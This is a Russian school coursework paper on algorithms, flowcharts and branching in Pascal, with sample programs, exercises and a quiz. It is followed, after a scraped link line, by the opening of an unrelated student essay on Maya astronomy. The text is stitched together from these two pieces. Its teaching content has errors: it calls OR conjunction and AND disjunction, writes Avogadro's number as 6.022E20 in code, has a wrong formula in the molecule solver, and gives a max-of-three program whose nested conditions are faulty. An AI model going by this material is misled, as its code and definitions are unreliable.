Вычислительный процесс называется линейным (не разветвляющимся), если направление его продолжения на любом этапе вычислений является единственным. Алгоритм линейного вычислительного процесса описывает действия, последовательность выполнения которых не зависит от исходных данных и результатов промежуточных вычислений, т.е является постоянной. Этот процесс является наиболее простым видом вычислений. Линейный процесс (как и другой вычислительный процесс) можно представить в виде следующих этапов: первый – задание исходных данных; второй реализация вычислений; третий – вывод результатов счёта и поясняющей информации. Этапы отображаются на блок-схеме, а затем реализуются в ПЭВМ в указанной последовательности.
Алгоритм деления отрезка АВ пополам:
1) поставить ножку циркуля в точку А
2) установить раствор циркуля равным длине отрезка АВ
3) провести окружность
4) поставить ножку циркуля в точку В
5) провести окружность
6) через точки пересечения окружностей провести прямую
7) отметить точку пересечения этой прямой с отрезком АВ
Каждое указание алгоритма предписывает исполнителю выполнить одно конкретное значения действий. Исполнитель не может перейти следующей операции, не завершив полностью предыдущую. Предписания алгоритма надо выполнять последовательно одно за другим, с соответствии с порядком их записи. Следование всем предписаниям гарантирует правильное решение задачи. Данный алгоритм совершенно ясен исполнителю
Блок-схема – алгоритм выраженный с помощью логических блоков. Блок – схема служит для того, чтобы наглядней представлять те или иные формы организаций действий. Каждое действие алгоритма, кроме проверки условия, будем помещать в прямоугольник, а вопрос о том, выполняется ли некоторое условие, - в ромб. Еще существуют: параллелограмм, овал, оборванный листок,
– это блок ввода данных с клавиатуры.
– в этом блок указывается начало или конец алгоритма
- это блок вывода данных на печать.
- в этом блоке помещаются действия алгоритма.
- блок в котором помещаются условия.
Вот так выглядит блок-схема линейной функции.
Начало
Подойти к ларьку
Протянуть деньги
Попросить газету.
Взять газету и сдачу
Отойти от ларька
Конец
1.2.2 Алгоритм с ветвлением.
В рассмотренных до сих пор алгоритмах и программах все команды выполнялись последовательно одна за другой в том порядке, в каком они были записаны. Однако таким образом может быть построен алгоритм для решения далеко не всякой задачи. В практике известны задачи, дальнейший ход решения которых зависит от выполнения каких либо условий.
Рассмотрим простой пример задачи из курса алгебры. Требуется построить алгоритм вычисления значения функции у = I x I. Она задаётся соотношением
Х при х >=0,
У =
-x при
При решении этой задачи требуется выполнить следующие условия.
Проверить больше или равен нулю х
Если х больше или равен 0, то присвоить у значение х (у:=x),
Если х меньше 0, то присвоить у значение –х(у:=-х).
Коротко алгоритм решения этой задачи может быть записан так:
Если x>=0,
ТО y:=x,
Иначе y=-x
Команды, с помощью которых записывается алгоритм подобного типа (разветвляющие алгоритмы), называются командами ветвления.
Ветвление - это такая форма организаций действий, при которой в зависимости от выполнения или невыполнения некоторого условия совершатся либо одна, либо другая последовательность действий.
Блок схемы на рисунках а, б, в, изображают соответственно последовательное выполнение действий (линейный алгоритм), ветвление в полной и неполной формах.
А) б)
В)
На рисунке изображена блок – схема алгоритма покупки билетов.
Подойти к кассе
Билеты на 12.00 имеются? имеются
Да Нет
Протянуть кассиру деньги
Назвать сеанс и количество билетов
Получить билеты
Отойти от кассы
Данная блок схем отображает ветвление в краткой форме, когда дей ствия и дут по одной ветке.
Но существует еще ветвление с полной формой ,когда действия идут по обоим веткам
Уменьшить скорость
Ремонт участка закончен
Проехать по 5 км отремонтированной шоссе
Проехать 10 км в объезд
пропро
Остановиться у АЗС
Для отработки составления блок схем с ветвлением я рассмотрел несколько алгоритмов и составил к ним блок схемы:
А) Присвоить х значение суммы углов А и С Четырёхугольника ABCD.
Присвоить y значение суммы углов B и D четырёхугольника ABCD.
Если х=у, то:
Построить серединный перпендикуляр к отрезку AB.
Построить серединный перпендикуляр к отрезку BC.
Найти пересечение построенных перпендикуляров.
Иначе:
Сообщить “Построение невозможно”.
Конец ветвления.
Б) Присвоить х значение суммы сторон AB и CD четырёхугольника ABCD.
Присвоить у значение суммы сторон BC и AD четырёхугольника ABCD.
Если х=у, то:
Построить биссектрису угла А.
Построить биссектрису угла В.
Найти пересечение построенных биссектрис.
Иначе:
Сообщить “Построение невозможно”.
Конец ветвления.
НачалоА)
ABCD
Присвоить х значение суммы углов А и С Четырёхугольника ABCD.
Присвоить y значение суммы углов B и D четырёхугольника ABCD.
Если Х=У
Построить серединный перпендикуляр к отрезку BC.
Найти пересечение построенных перпендикуляров.
Вывести сообщение “Построение невозмоджно”
Построить серединный перпендикуляр к отрезку BC.
Найти пересечение построенных перпендикуляров.
Конец
Б)
Начало
ABCD
Присвоить х значение суммы сторон AB и CD четырёхугольника ABCD.
Присвоить у значение суммы сторон BC и AD четырёхугольника ABCD.
X=Y
Построить биссектрису угла А.
Построить биссектрису угла В.
Найти пересечение построенных биссектрис.
Вывести сообщение “построение невозможно”
Конец
Конец
II. Ветвление в Паскале
2.1 Языки программирования.
Чтобы компьютер выполнил решение какой – либо задачи, ему необходимо получить от человека инструкции, как её решать. Набор таких инструментов для компьютера, направленный на решение конкретной задачи, называемой компьютерной программой.
Современные компьютеры не настолько совершены, чтобы понимать программы, записанные на каком – либо употребляемой человеком языке – русском, английском, японским… Команды, предназначенные для ЭВМ, необходимо записать в понятной её форме. С этой целью применяются языки программирования – искусственные языки, алфавит, словарный запас и структура которых удобны человеку и понятнее компьютеру.
В самом общем смысле языком программирования называется фиксированная система обозначений и правил для описания алгоритмов
и структур данных. Языки программирования имеют как бы два лица. Одно из них обращено к человеку, использующему язык для записи своих программ, а другое адресовано ЭВМ, которая должна понимать команды.
Исходя из этого все языки программирования делятся на языки низкого, высокого и сверхвысокого уровня.
Языки низкого уровня – это средство записи инструкций компьютеру простыми приказами – командами на аппаратном уровне. Такой язык отражает структуру данного класса ЭВМ и поэтому иногда называется Машинно – ориентированным языком. Пользуясь системой команд, понятной компьютеру, можно описать алгоритм любой сложности. Правда, такая запись для сложных задач будет на столько громоздкой, что у человека будет мало шансов сделать её безошибочной, так как этот язы мало приспособлен для использования человеком, ведь запись программы на этом языке представляет собой последовательность нулей и единиц.
Существенной особенностью языков программирования низкого уровня жесткая ориентация на определённый тип аппаратуры (систему команд процессора). В стремлении приспособить язык программирования низкого уровня к человеку разработан язык символического кодирования (автокод или язык ассемблера), структура команд которого определяется форматами команд и данными Машиного языка. Программа на этом языке ближе к человеку, потому что операторы этого языка – те же команды, но они имеют мнемонические названия, а в качестве операндов используются не конкретные адреса в оперативной памяти, а их символические имена.
Более многочисленную группу составляют языки программирования высокого уровня, средства которых допускают описание задачи в наглядном, легко воспринимаемом виде. Отличной особенностью этих языков является их ориентация не на систему команд той или иной ЭВМ, а на систему операторов, характерных для записи определённого класса алгоритмов. К языкам программирования этого типа относятся: Бейсик, Фортран, Алгон, Паскаль, Си. Программа на языках высокого уровня записывается системой обозначений, близкой человеку (например, фиксированным набором слов английского языка, имеющих строго определённое назначение). Программу на языке высокого уровня проще понять и значительно легче отладить.
К языкам программирования сверхвысокого уровня можно отнести Алгон-68, при разработке которого сделана попытка формализовать описание языка, приведшая к появлению абстрактной и конкретных программ. Абстрактная программа создаётся программистом, конкретная выводится из первой. Предполагается, что при таком подходе принципиально невозможно породить неверную синтаксически ( а в идеале семантически) конкретную программу. Язык APL относят к языкам свервысокого уровня за счёт введения сверхмощных операций и операторов. Запись программ на таком языке получается компактной.
Все вышеперечисленные языки – вычислительные. Более молодые – декларативные (непроцедурные) языки, отличительная черта которых – задание связей и отношений между объектами и величинами и отсутствие определения последовательности выполнений действий. Такие языки сыграли важную роль в программировании, так как они дали толчок к разработке специализированных языков искусственного интеллекта и языков знаний.
2.2 Язык программирования Паскаль.
Язык программирования Паскаль (назван в честь выдающегося французского математика и философа Блеза Паскаля (1623 – 1662)), разработан в 1967 – 1971гг. Никлаусом Виртом, профессором, директором института информатики Швейцарской высшей политехнической школы. Язык Паскаль, созданный первоначально для обучения программированию как систематической дисциплине, скоро стал широко использован для разработки программных средств в профессиональном программировании.
Широкой популярностью Паскаля среди программистов способствовали следующие причины:
- Благодаря своей компактности, удачному первоначальному описанию Паскаль оказался достаточно лёгким для обучения.
- Язык программирования Паскаль . Отображает фундаментальные и наиболее важные концепции (идеи) алгоритмов в очевидной и легко воспринимаемой форме, что предостовляет программисту средства, помогающие проектировать программы.
- Язык Паскаль позволяет чётко реализовать идеи структурного программирования и структурной организации данных.
- Язык Паскаль сыграл большую роль в развитии методов аналитического доказательства правильности программ и позволил реально перейти от методов отладки программ к системам автоматической проверки и правильности программ.
- Применения языка Паскаль значительно подняло “планку” надёжности разрабатываемых программ за счёт требований Паскаля к описанию используемых в программе переменных при компиляции без её выполнения.
- Использование в Паскале простых и гибких структур управления: ветвлений, циклов.
2.3 Условный оператор в Паскале.
Условные операторы предназначены для выбора к исполнению одного из возможных действий ( операторов) в зависимости от некоторого условия (при этом одно из действий может быть пустым, т.е. отсутствовать) В качестве условий выбора используется значение логического выражения. В Турбо Паскале имеются два вида условных операторов: if иcase.
Оператор условиа if. Оператор условия if является одним из самых популярных средств, имеющих естественный порядок выполнения операторов программы. Синтаксическая диаграмма оператора if выглядит таким образом:
IF
Выражение
Then
Оператор
else
оператор
Операторы условия if выполняются следующим образом. Сначала выражается выражение, записанное в условии. В результате его вычисления получается значение булевского типа. В первом случае, если значение выражения есть true (истина), выполняется <оператор 1>, указанный после слова Then (то). Если результат вычисления выражений в условии естьFalse (ложь), то выполняется <оператор 2>. Во втором – если результат выражения true, то выполняется <оператор>, если false – оператор, следующий сразу за оператором if. Операторы if могут быть вложенными.
Read (Ch);
If Ch=’N’ then parol:= True
Else Parol := False;
Read (x);
If Parol = True then
If x = 100 then Writeln (‘пароль и код правельны’)
Else begin
Writeln (‘Ошибка в коде’);
End;
В данном примере с клавиатуры считывается значение переменной символьного типа Ch. Затем проверяется условие Ch=’N’. Если оно выполняется, то переменной Parol булевского типа присваеватся значение True, если условие не выполняется, False. Затем с клавиатуры считывается значение кода Х. Далее оператор проверяет условие Parol = True. Если оно имеет значение True, то выполняется проверка введённого пароля оператором if X=100. Если условие Х=100 имеет значение True, то выводится сообщение “Пароль и код правельны”, и управление в программе передаётся на оператор, следующий за словом end, если оно имеет значение False, выполняется соствной оператор, стоящий после слова else, который выводит на экран видеомонитора сообщение “ошибка в коде”, и вызывает стандартную процедуру Halt(1) для остановки программы.
Составной оператор (оператор варианта).
Условный оператор позволяет осуществить ветвление программы только по двум направлениям, одно из которых соответствует выполнению проверяемого условия. Если для переменной необходимо осуществить ряд действий, зависящих от других условий, то надо записывать либо вложенные условные операторы, либо несколько операторов подряд. Для такой операции удобно использовать оператор варианта.
Вход в структуру содержит вычисление или ранее полученное значение переменной (индекса варианта). Это значение может совпасть с меткой, стоящей перед оператором на одной из ветвей переключаются. В таком случае выполняется оператор, помеченный этой меткой, и происходит выход из структуры. Оператор бывает простым или составным, ограниченым операторными скобками begin … end; Если значение индекса варианта не совпало ни с одной из меток, то выполняется оператор с номером n + 1 из строки else. Если оператор варианта содержит строку else , то это - полная форма оператора, если такой строки нет, то используется сокращённая форма оператора варианта.
Метки оператора варианта могут быть константами любого типа. Их тип должен совпадать с переменной индекса варианта. Возможно, чтобы индекс варианта должен был как именем переменной, так и выражением соответствующего типа.
В рассмотренных до сих пор алгоритмах и программах все команды (операторы) выполнялись последовательно одна за другой в том порядке, в котором они были записаны. Однако таким образом может быть построен алгоритм для решения далеко не всякой задачи.
В практике хорошо известны задачи, дальнейший ход решения которых зависит от выполнения какого либо условия.
Рассмотрим простой пример задачи из курса алгебры. Требуется построить алгоритм вычисления значений функции у = |х|. Она задаётся соотношением:
Y =
На языке Паскаль оператор варианта имеет вид:
Case индекс варианта of
Метка 1: оператор 1;
Метка 2: оператор 2;
…
Метка n: оператор n;
Else оператор n + 1
End;
Пример:
Составить программу-решатель.
Дано: молярная масса вещества М, плотность данного вещества Р, масса R или объём V. Требуется найти число молекул К: 1) в единице массы вещества; 2) в теле заданной массой: 3) в единице объёма вещества; 4) в теле заданным объёмом. Для решения задачм воспользуемся формулой:
K = (NА/M)R,
Где NA = 6,022 * 10²³г/моль – число Авогадро.
На основании этой формулы получаем расчётные формулы для программы:
1)K=NA/M; 2)K=NAR; 3)K=NAPV/M 4)K=NAP/M.
Программа имеет вид:
Program E20;
Const NA = 6.022 E20;
Var N: integer; M, R, P, V, K: real;
Begin
Writeln (‘зная постоянную Авогадро, Плотность P данного вещества’);
Writeln (‘и его молярную массу М, можно найти число молекул в’);
Writeln (‘1. в единице массы вещества’);
Writeln (‘2. в теле массой R’);
Writeln (‘3. в единице объёма’);
Writeln (‘4. в теле объёмом V’);
Write (‘введите номер решающей задачи’);
Readln (N);
Write (‘введите исходные данные: М =’);
Readln (M);
Case N of
1: K: = NA / M;
2: begin
Write (‘R = ‘);
Readln (R);
K: = NA *R/M;
End;
3: begin
write (‘плотность вещества Р = ’);
Readln (P);
Write (‘V = ‘);
Readln (V);
K: = NA *P*V/M;
End;
4: begin write (‘плотность вещества P = ’);
Readln (P);
K: = NA *P/V
End;
End;
Write (‘число молекул K = ’, K’);
End.
2.3.2 Вложенные условия.
Существуют задачи в которых по одной из ветки ветвления нужно рассмотреть ещё одно условие.
Рассмотрим задачу: сравнить 3 целых числа и вывести на печать максимальное.
Program chisla;
Var a, b, c: integer;
Begin
Writeln (‘Введите три числа’);
Read (a, b, c);
If a<b then
If a>c then writeln (‘ максимально число ’, a)
Else if b>c then writeln (b максимально число’, b)
Else writeln (‘c максимальное число’, c);
End.
Вот блок – схема данной задачи:
Начало
a>b
b>c
a>c
B
C
A
Конец
ABC
2.3.3 Логические выражения.
Алгоритм решения квадратного уравнения содержит проверку условия D<0. Два значения, D и 0, связаны отношением < - меньше. Если условие выполняется то говорят что соответствующее выражение истинно, если не выполняется то ложь.
Речь идёт о логическом выражении. Примером логических выражений могут служить математические отношения связанные знаками >, <, =, логические выражения имеют два значения True( истина) и False (ложно). Логические выражения такие могут иметь логические операции: отрицания (NOT), конъюнкций (OR) и дизъюнкции (AND).
Логические операции имеют следующую таблицу истинности:
A
B
Not (A)
(A) AND (B)
(A) OR (B)
True
True
False
True
True
True
False
False
False
True
False
True
True
False
True
False
False
True
False
False
Пусть требуется определить, принадлежит ли точка с координатой x отрезку [a; b]. Если записать это условие двойным неравенством, то читать его надо так: x меньше либо равен b и больше либо равен a (a<x<b). Отношение “меньше или равно” в Паскале записывается двумя знаками. Аналогично записывается и “больше либо равно”. Однако в Паскле нельзя записывать двойное неравенство. Используя логическую операцию and (и), запишем:
(x>=a) and (x<= b).
Отношения, между которыми стоит логическая операция, заключаются в круглые скобки.
Имеется прямоугольное отверстие со сторонами a и b и кирпичь с рёбрами x, y z. Требуется составить условие прохождения кирпича в отверстие.
Кирпич пройдёт в прямоугольное отверстие, если выполняется сложное условие:
(a>=x) and (b>=y) or
(a>=y) and (b>=x) or
(a>=x) and (b>=z) or
(a>=z) and (b>=x) or
(a>=y) and (b>=z) or
(a>=z) and (b>=y)
Для трёх граней шесть условий получается потому, что можно каждую грань повернуть на 90 и проверить для каждой грани два случая.
Определить принадлёжность точки фигуре. Пусть фигура задана ограничивающими её прямыми.
Для каждой прямой определим полу плоскость, в которой находится фигура- треугольник АВС. Полуплоскость задаётся неравенством.
Полуплоскость, находящаяся выше от оси х определяется неравенством y>0.
Полуплоскость, находящаяся справа от прямой, соединяющей точки (-1,0) и (0,2), задаётся неравенством y-2x-2<0.
Полуплоскость, находящаяся слева от прямой, соединяющей точки (1,0) и (0,2), задаётся неравенством y+2x-2<0.
Условие принадлежности точки (x,y) фигуре :
(y>0) and (y-2*x-2<0) and (y+2*x-2<0).
Приведём пример программы определяющая существования треугольника со сторонами a, b и c. Условие существования треугольника известно из геометрии: сумма двух любых сторон должна быть больше третьей. Следовательно, для всех сторон условие “сумма двух больше третьей” должно выполняться.
Program e4;
Var a, b, c: real;
Begin
Writeln (‘дите длины трёх сторон треугольника’);
Readln (a, b, С);
Write (‘треугольник со сторонами ’, a, b, c);
If (a+b>c) and (b+c>a) and (a+c>b)
Then writeln (‘существуют’)
Else writeln (‘не существуюет’);
Readln
End.
Ш . Технологический пакет к урокам информатики по теме “Ветвление в Паскале”
Задачи с ветвлением и их решение.
Program vetvlenie;
Var t: integer;
Begin
Writeln ('Введите температуру сегодня');
Readln (t);
If t<=-30
Then
Writeln (‘Не идти в школу ')
Else writeln (‘Идти в школу');
End.
Программа показывает идти ученику сегодня в школу или нет. С клавиатуры он вводит сегодняшнюю температуру, и если она меньше -30, то не идти в школу, а если больше то выводится сообщение о том чтобы идти в школу. Теперь попробуйте написать программу:
Сделать так чтобы программа выводила сообщение о том у кого больше денег и у кого меньше.
Переделать программу так чтобы вместо денег выводилось сообщение о том кто больше попрыгал. Значения так же вводятся с клавиатуры.
Рассмотри задачу: Для модельного агентства выбираются девушки с объёмами 90 (грудь), 60 (талия), 90 (бёдра). Составить программу для отбора девушек по этим параметрам.
Начало
ABC
A= 90
B= 60
C= 90
Вы нам не подходите
Вы нам подходите.
Конец
конец
Вопросы и задачи по всей теме.
Составьте программу, которая из двух вводимых вами целых чисел печатает заключение о том, какое число больше
Составьте программу, проверяющую, верно ли утверждение, что введённое вами число является чётным.
Составить программу, определяющую, входит ли введенная вами цифра в десятичную запись введенного вами трёхзначного числа, и печатуящая сообщение о том, входит ли эта цифра в запись числа или нет.
Напишите программы на Паскале для решения следующих задач.
Даны три числа a, b, c. Выясните верно ли a<b<c. Ответ получите в текстовой форме: верно или не верно.
Даны положительные числа a, b, c, x. Выясните, пройдёт ли кирпич с рёбрами a, b, c в квадратное отверстие со стороной x.
Даны три действительных числа. Выберете те из них, которые принадлежат отрезку [1;3].
Присвойте величине а значение наибольшего из трёх заданных чисел.
Даны два числа. Выведите первое из них, если оно больше второго, и оба числа, если это не так.
Проверьте, если среди трёх заданных чисел равные.
Даны три действительных числа. Найдите наибольшее значение их суммы и произведения.
Напишите программу – модель анализа пожарного датчика в помещении, которая выводит сообщение «пожарная ситуация», если температура (в нашей модели она будет вводиться с клавиатуры) в комнате превысила 600 .
Составьте программу, которая из двух вводимых вами чисел, печатает заключение о том, какое число больше.
Составьте программу, проверяющую, верно ли утверждение, что введённое целое число делится без остатка на 3.
Напишите программу, которая анализирует человека по возрасту и относит его к одному из четырёх групп: дошкольник, ученик, рабочий, пенсионер. Возраст вводится с клавиатуры.
Составьте программу, определяющую, входит ли введённая вами цифра в десятичную запись введённого вами трёхзначного числа, и печатающую сообщение о том, входит ли эта цифра в запись числа или нет.
Составьте программу, которая по трём введённым вами числам определит,
могут ли эти числа быть длинами сторон треугольника, если да, то какой получился треугольник с данными длинами сторон (прямоугольный, остроугольный, тупоугольный).
Составьте программу, определяющую, лежит ли точка с указанными координатами X, Y на окружности радиуса R с центром начала координат.
Составьте программу нахождения корня уравнения ax+b=c, где a, b, c – данные числа.
Даны три действительных числа. Возвести в квадрат те из них, значения которых не отрицательны.
Даны три действительных числа. Выбрать из них те, которые принадлежат отрезку {-5;3}.
Известны результаты соревнования трёх лыжник4ов. Выбрать результат победителя и занявшего третье место.
Дано натуральное четырёхзначное число. Верно ли, что все четыре цифры различны?
Дано натуральное число n(n<100), определяющее возраст человека (в годах). Дать для этого числа наименование «год», «года» или «лет»: например, 21 год, 44 года, 65 лет и т.д.
Тест.
Что такое алгоритм?
А) последовательность выполнения действий.
Б) составление программы.
В) Не знаю.
Что такое Блок-схема?
А) Рисунки квадратиков.
Б) графическое изображение алгоритма.
В) Не имеющие смысла геометрические фигуры.
Для чего нужно ветвление в паскале?
А) Для решения более сложных задач.
Б) Для того чтобы больше подумать над решением задачи.
В) я не знаю.
Какое из этих языков программирования не относится к высшему уровню?
А) Паскаль
Б) Бейсик
В) Машинно – ориентированный
Где чаще всего используется язык программирования Паскаль?
А) Дома
Б) В хакерских группировках
В) В школе и других учебных заведениях.
Каких алгоритмов не существует?
А) Корявых
Б) линейных
В) С ветвлением.
Каких операторов не существует?
А) Условный.
Б) Заумный.
В) Составной.
Почему язык Паскаль такой популярный?
А) Он простой в обучении и изучается в школах
Б) Очень сложный Язык программирования и это мне нравится.
В) Я не знаю.
С какой командой начинается программа?
А) начало
Б) var
В) begin
Как выглядит оператор присваивания?
А) :=
Б) :()
В) =;
Что указывается в операторах?
А) условие
Б) переменные
В) начало и конец.
Заключение.
Цель моей работы достигнута: я рассмотрел различные виды алгоритмических конструкций, изучил конструкцию ветвления, научился решать задачи с ветвлением, подобрал и составил сам задачи, тесты и др. задания.
В дальнейшем я бы хотел продолжить свою работу, рассмотрев в Паскале другие конструкции. Так же мне хотелось бы узнать, как описывается конструкция ветвления в других языках программирования.(C++, Delphi)
126 (6-16)
Список литературы
Введение в програмирование: Учеб. Пособие для уч. Сред.и ст. шк. Возраста / Авт.-сост. В.А. Гольденберг.- Мн.: ООО”Харвест”, 1997.- 528 с. (библиотека школьника).
Бондарев В.М., Гублинский В.И., Качко Е.Г..
Основа програмирования/ худож. – оформитель С.А. Пяткова. – Харьков: Фолио; Ростов Н/Д: Феникс, 1997. –368с.
Турбо Паскаль 7.0 – К.: торгово – издательское бюро BHV, 1996 – 448с.: ил. Т. Рюттяна.
Игошев А.Д. Матинин Е.Г. Express Pascal. Учебное пособие для средних уч. Заведений.
Кузницов А.А. Патапова Н.В. Основы информатики. 8-9 кл.: Учеб. Для общеобразовательных учеб. Заведений 2001 176с.:ил.
2 |
https://doc4web.ru/istoriya/astronomiya-mayya-kak-zemnoe-otrazhenie-kosmosa.html | Астрономия майя как земное отражение космоса | https://doc4web.ru/uploads/files/208/7c60a674c7cdbed84f4793c47af5cbce.docx | files/7c60a674c7cdbed84f4793c47af5cbce.docx | УО «Белорусский государственный педагогический университет имени М.Танка»
РЕФЕРАТ
по курсу «Новая история Латинской Америки»
Тема:
«Астрономия майя как земное отражение космоса.
Календарь и гороскоп майя»
Выполнил:
Наривончик Дмитрий
Степанович
Проверил:
Осипович Александр Иванович
Минск 2006 г.
ОГЛАВЛЕНИЕ
Вступление…………………………………………………………………….…..2
Общественная организация и религиозные верования…………........................3
Астрономия и математика майя………………………………….………………4
Календарная система майя..……...………………………………………………6
Заключение………………………………………………………………………...7
Список литературы………………………………………………………………..7
ВСТУПЛЕНИЕ
Майя, уникальная цивилизация Мезоамерики, не знавшая металлов, плуга, колесных повозок, домашних животных, гончарного круга, используя только каменные орудия труда, сумела добиться высокого уровня развития производственных сил и построения сложной общественной организации. Майя достигли поразительного совершенства в архитектуре, скульптуре и живописи, за пятнадцать веков до Колумба изобрели точный солнечный календарь и создали единственную в Америке иероглифическую письменность, использовали в математике понятие нуль, уверенно предсказывали солнечные и лунные затмения. Древние майя уделяли большое внимание изучению календаря и летосчисления, математики, астрономии, медицины и истории. Кроме того, у них имелись некоторые практические сведения по географии, геодезии, метеорологии, климатологии, сейсмологии и минералогии. Все эти отрасли были тесно переплетены с религиозными учениями о демонах, божествах, знамениях и предсказаниях, строясь на основании мировоззрения в сложную систему знаний и представлений о всеобщем устройстве космоса.
Но в IX в. цветущие города были заброшены на самом пике своего развития, население резко сократилось, и вскоре тропическая растительность укрыла своим зеленым ковром памятники былого величия. После X в. развитие культуры майя, уже несколько измененной влиянием со стороны чужеземных завоевателей – тольтеков, пришедших из центральной Мексики и с побережья Мексиканского залива, продолжалось на севере – на полуострове Юкатан – и на юге – в горах Гватемалы. В XVI в. индейцы майя занимали обширную и разнообразную по природным условиям территорию, включавшую в себя современные мексиканские штаты Табаско, Чьяпас, Кампече, Юкатан и Кинтана-Рио, а также всю Гватемалу, Белиз, западные районы Сальвадора и Гондураса. Предки майя и сейчас живут в Латинской Америке, храня обычаи и традиции своих предков, но большая часть социокультурного опыта майя безвозвратно утрачено в годы колониальной эксплуатации, что создает неизмеримый вакуум в наших знаниях о первой цивилизации-гегемоне Центральной Америки.
ОБЩЕСТВЕННАЯ ОРГАНИЗАЦИЯ И РЕЛИГИОЗНЫЕ ВЕРОВАНИЯ
Особенностью общественной организации майя было сочетание светской и духовной власти. Это гармонизировало вертикаль соподчинения низших слоев высших, освящало общественный порядок, сакрализировало все государственное устройство. Так, например, каждый город-государство майя возглавлял «халач-виник» («настоящий человек») объединявший в своем лице самую высоую административную власть и сочетавшаяся с высший жреческий сан. Жрецы различного ранга, самое распространенное название которых было «ах кин», составляли сложный аппарат государственного управления. Причины подобной концентрации власти преимущественно в руках жрецов, как и ее истоки, следует искать в земледельческом характере самой религии майя. Экономика общества основывалась на земледелии, маис составлял 65% питания индейцев майя. Его возделывали при помощи подсечно-огневой системы со всеми вытекающими из этого явления последствиями: оскудением почв, снижением урожайности, вынужденной сменой участков. Этот ярко выраженный аграрный характер экономики, ориентация на естественную продуктивность почвы делали её сильно зависящей от природных факторов и форс-мажорных обстоятельств. Микрокосм человеческого мира здесь соседствовал с макрокосмом сверхъестественных обстоятельств, поэтому сельское хозяйство нуждалось в специальных знаниях и ритуалах, позволявших сохранить хрупкое равновесие между этими двумя мирами и надеяться на хороший урожай.
У майя знание и религия были неотделимы одно от другого и составляли единое мировоззрение, которое находило отражение в их искусстве. Представления о разнообразии окружающего мира персонифицировались в образах многочисленных божеств, которых можно объединить в несколько основных групп, соответствующих разным сферам опыта людей: боги охоты, боги плодородия, боги разных стихий, боги небесных светил, боги войны, боги смерти и так далее. В разные периоды истории майя те или другие боги могли иметь разную значимость для их почитателей. Майя полагали, что вселенная состоит из 13 небес и 9 подземных миров. В центре земли находилось дерево, которое проходило сквозь все небесные сферы. На каждой из четырех сторон земли стояли еще по одному дереву, символизируя страны света — востоку соответствовало красное дерево, югу — желтое, западу — черное и северу — белое. Каждая сторона света имела несколько богов (ветра, дождей и держателей небес), имевших соответствующий цвет.
Одним из важных богов у майя классического периода был бог кукурузы, представляемый в облике молодого человека с высоким головным убором. Ко времени появления испанцев другим важным божеством считался Ицамна, представляемый в виде старика с горбатым носом и бородкой. Как правило, изображения божеств майя включали в себя многообразную символику, говорящую о сложности мышления заказчиков и исполнителей скульптур, рельефов или рисунков и не всегда понятную нашим современникам. Так, у бога солнца были большие кривые клыки, его рот был оконтурен полосой из кружков. Глаза и рот другого божества изображены в виде свернувшихся змей и т.д. Среди божеств женского пола особенно значимой была, если судить по кодексам, «красная богиня», супруга бога дождя; ее рисовали со змеей на голове и с лапами какого-то хищника вместо ног. Женой Ицамны была богиня луны Иш-Чель; считалось, что она помогает при родах, в ткачестве и в медицине. Некоторых богов майя представляли в образе животных или птиц: ягуара, орла. В тольтекский период истории майя среди них распространилось почитание центральномексиканских по происхождению божеств. Одним из наиболее уважаемых богов подобного рода был Кукулькан, в образе которого явны элементы бога Кецалькоатля народов науа.
Образец мифологии майя доиспанского периода дает сохранившийся с колониального времени эпос одного из народов Гватемалы «Пополь-Вух». Он содержит в себе сюжеты сотворения мира и людей, происхождения героев-близнецов, их борьбы с подземными владыками и др.
Почитание божеств у майя выражалось в сложных ритуалах, частью которых были жертвоприношения (в том числе и человеческие) и игра в мяч. Хотелось бы отметить еще одно явление, распространенное в те времена – это игра в мяч, внешне похожая на современный баскетбол. Игроки должны были попасть мячом в каменное кольцо, прикрепленное к стене стадиона – специального игрового поля. При этом они должны были касаться мяча не руками, не ступнями, а лишь бедрами, ягодицами, плечами и локтями. Для обеспечения своей безопасности члены «команд» надевали специальную защитную одежду – маску и нагрудники. При этом они становились похожими скорее на бейсболистов. Некоторые полагают, что в конце игры победитель отрезал побежденному голову – наподобие гладиаторов римского Колизея. Однако в данном случае речь могла идти лишь о религиозном жертвоприношении. Само соревнование носило ритуальный, магический характер. Ритуал этот теснейшим образом был связан с культом плодородия земли - изображения сцен игры и обезглавливания всегда содержали элементы растительного орнамента.
АСТРОНОМИЯ И МАТЕМАТИКА МАЙЯ
Во всей Месоамерике не было народа, который достиг бы более значительных успехов в науках, чем это удалось майя – народу необычайных способностей. Высокий уровень цивилизации определяли в первую очередь астрономия и математика. В этой сфере они действительно оказались в доколумбовой Америке вне всякой конкуренции. Их достижения не сопоставимы ни с какими другими. Майя превзошли в данных науках даже своих современников-европейцев. В настоящее время известно о существовании не менее 18 обсерваторий периода расцвета Петена. Так, Вашактун занимал исключительное положение и считался особенно важным центром, поскольку именно именнтам определялись точки солнцестояния и равноденствия. Исследователь Блом провел серию экспериментов на центральной площади Вашактуна. Основываясь на расчетах точной широты и долготы города, он смог разгадать увлекательный секрет древнего ансамбля, состоявшего из храмов и пирамид, окружавших квадратную, ориентированную по сторонам света площадь. «Волшебным секретом » оказался способ, посредством которого жрецы расположившиеся на вершине пирамиды-обсерватории, благодаря храмам-ориентирам устанавливали с математической точностью точку восхода солнца в периоды солнцестояния и равноденствия.
Жрецы, составлявшие высшую прослойку общества, хранили прапрадедовские астрономические знания о движении звезд, Солнца, Луны, Венеры и Марса. На основании многовековых наблюдений они вычислили продолжительность солнечного года с точностью, превосходящей григорианский календарь, которым пользуемся в настоящее время мы. По их вычислениям длина этого года равнялась 365.2420 дням; по григорианскому календарю она составляет 365.2425 дней, а по современным астрономическим данным — 365.2422 дня. Они умели рассчитывать наступление солнечных затмений, близко подошли к пониманию 19-летнего метонова цикла. В 682 г. жрецы-астрономы Копана ввели в употребление формулу, по которой 149 лунных месяцев равнялись 4400 дням. Вскоре эта формула была принята почти во всех городах классического периода. По ней длина лунного месяца равнялась в среднем 29.53020 дням – цифра, очень близкая к данным наших астрономов (29.53059 дней). В качестве календаря использовался цикл планеты Венера со средней продолжительностью 583.48 дней; на листах 24-29 Дрезденской рукописи изложен замечательный календарь Венеры, верный в общей сложности на 384 года. Майя были известны и Другие планеты: Марс, Сатурн, Меркурий, Юпитер. Однако здесь, как и в других астрономических вопросах, мнения исследователей так сильно отличаются друг от друга, что становится ясным только одно: работа лишь начата.
Один из исследователей, специализирующийся на изучении календарных систем майя, Спинден предполагает, что майя был известен зодиак, состоящий, однако, не из двенадцати, а из тринадцати. На листах 23 и 24 Парижской рукописи, по его мнению, изображены знаки зодиака. А в таком случае первыми домами его должны были быть: Скорпион, Черепаха и Гремучая Змея.
